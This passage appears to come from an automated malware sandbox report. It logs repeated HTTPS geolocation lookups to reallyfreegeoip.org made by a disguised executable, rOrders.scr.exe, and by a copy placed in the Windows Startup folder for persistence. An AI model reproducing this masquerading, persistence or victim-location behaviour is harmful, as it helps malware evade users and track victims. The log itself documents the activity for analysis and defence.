2025-01-13 12:31:19 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49717	104.21.32.1	443	4760	C:\Users\user\Desktop\rOrders.scr.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 12:31:20 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-13 12:31:20 UTC	862	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 12:31:20 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2086270 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2TqFiS%2FIUbkEY%2BszFwvZDsUFybtL6PIGM%2FG0JDOP6Nzskzg3L4kwM%2FkVveQDRBRQhxNx8IduH708LszR979j6rR%2BqOU5hf%2BMNBOYkMxNZWqgD30ja6eSeC0Ywp46%2FkVVoHvvrzyR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9015671bcb2b4344-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1669&min_rtt=1663&rtt_var=636&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1702623&cwnd=47&unsent_bytes=0&cid=55fc613447082bee&ts=146&x=0"
2025-01-13 12:31:20 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49719	104.21.32.1	443	4760	C:\Users\user\Desktop\rOrders.scr.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 12:31:22 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-13 12:31:22 UTC	861	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 12:31:22 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2086271 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5Vscsq5KAUlJ0j1%2F1KXOOMc%2FluWxsFXqWLbW7wkFeLnHnNUrURw8cwiBd%2BDDCVuDR73KCRQpUTe2LP0FEpe%2BZ%2BjmZeEDslvYl8rG5%2FVffbpC4gajcjSMBshpgrWYd0BZDscazmBs"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901567251bea1875-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1531&min_rtt=1524&rtt_var=587&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1841109&cwnd=153&unsent_bytes=0&cid=de408e63fc3e1ad5&ts=148&x=0"
2025-01-13 12:31:22 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49721	104.21.32.1	443	4760	C:\Users\user\Desktop\rOrders.scr.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 12:31:23 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-13 12:31:23 UTC	869	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 12:31:23 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2086272 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cFD30iZ%2BCboH191Y%2F%2Bp%2FwLpev6GXsFq%2Bcwv1vBCoIOfaoOUeL6s%2F9Cvow2bYYxxF%2B47IX8wIJBBlvGz74vdP3U%2F%2FqGPEoQpcc1GdJ9E3UKbWoKdilzxCZdtqwSQdEULUtn%2FxDrcL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9015672d3d3672b9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1789&min_rtt=1785&rtt_var=678&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1602634&cwnd=217&unsent_bytes=0&cid=8e588f838ec5d43b&ts=151&x=0"
2025-01-13 12:31:23 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49723	104.21.32.1	443	4760	C:\Users\user\Desktop\rOrders.scr.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 12:31:24 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-13 12:31:25 UTC	861	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 12:31:24 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2086274 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1u4tfa%2FhHs6kxZ%2BPxhyuAKtCXW4%2FxjrsH2DMAmGnnod7eix178z5nqyG4FSp9Rzh3JcdeWLxiIPPdul3VfOCEptUmkwp%2Bes78ra%2FqqMmo0tzWgXXu%2FOoDf6EYuedDLU2DfRKKJLZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901567353aed1875-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1580&min_rtt=1576&rtt_var=600&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1808049&cwnd=153&unsent_bytes=0&cid=29ebc483faf53d2e&ts=134&x=0"
2025-01-13 12:31:25 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49727	104.21.32.1	443	7192	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 12:31:29 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-13 12:31:29 UTC	864	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 12:31:29 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2086278 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ER2y1NAatdzV3ZyBV%2Bg0rFoKhpM%2BCZDYUm%2BGPiK%2BT0kstTp5xwpYu3w%2FjSb61LmkHbJNy5xjgZKQ39HwlzT0qTNPclGXs2IFjdMJAp66%2FKKyGe%2FzhWzmOeb2ikO21xAP638xhC%2Fa"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9015674f1b854344-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1665&min_rtt=1659&rtt_var=635&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1705607&cwnd=47&unsent_bytes=0&cid=5de50acadb3cfe2b&ts=164&x=0"
2025-01-13 12:31:29 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49740	104.21.32.1	443	7192	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 12:31:29 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-13 12:31:29 UTC	859	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 12:31:29 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2086279 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BrV0Oel2ammY9dSqqLlmGAElZXtNLUXgwzR53Kp7j%2FnUcxq2rhJY%2BIYjmfUsnxKNTfv6vlhV%2BsA%2FRT7AMJZLOQORLGz1NmDQ7fiVIJ%2FEGfpfUer16L2ol6MCyoQdsIkMZdXk5IPF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901567542c4972b9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1853&min_rtt=1835&rtt_var=701&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1591280&cwnd=217&unsent_bytes=0&cid=4990ffe5ba48e334&ts=130&x=0"
2025-01-13 12:31:29 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49748	104.21.32.1	443	7192	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 12:31:31 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-13 12:31:31 UTC	857	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 12:31:31 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2086280 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1pLokVinbqhoqqGh1bWVlxLkVy%2BNrsY4k6jWNebiRM0gZPJkeAQJmu6oeGwytrfuGEN1rwFWkrQRRjxGOXhUn5FEGtOnt6heJiMecjZ9TET9Hd0T%2BhE2%2F%2BLN99oqVmt6HnOLrC2A"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9015675c5dddc327-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1630&min_rtt=1627&rtt_var=612&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1794714&cwnd=189&unsent_bytes=0&cid=5cec34c14af241df&ts=135&x=0"
2025-01-13 12:31:31 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49759	104.21.32.1	443	7192	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 12:31:32 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-13 12:31:32 UTC	863	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 12:31:32 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2086281 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SQnubKEbA49xerbbqAJzhopK%2FNvHdeoIuWMKDBsBCPoQ%2ByOvvJGB9cAJUgid07WJRz1OwJa%2BgLuKwfg7sELmogwX9t3GEFiGhnPuUU7nj2%2B1Bf2d%2FbQh%2BLvgVOF8X%2BEYo7a4fFFZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901567647a5cc327-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1752&min_rtt=1710&rtt_var=672&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1707602&cwnd=189&unsent_bytes=0&cid=0d140c58a932f4ef&ts=130&x=0"
2025-01-13 12:31:32 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49764	104.21.32.1	443	7192	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 12:31:33 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-13 12:31:33 UTC	856	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 12:31:33 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2086283 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YLCB0rStKmOUbhOInpgCDDdVg9raTiFtssW16qQ56udm3T0pKjZeOYpy1RwQ2NF0DoA%2BuAm3fB2Nho0GeUYbd%2F1ln%2BsQPRRcnFIeNYwvSz9UnlPm7PotN81aYtgk7PHD%2BePNtTFf"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9015676cc8384344-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1637&min_rtt=1631&rtt_var=625&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1733966&cwnd=47&unsent_bytes=0&cid=a9b2ef216e6a6c04&ts=139&x=0"
2025-01-13 12:31:33 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49774	104.21.32.1	443	7192	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 12:31:35 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
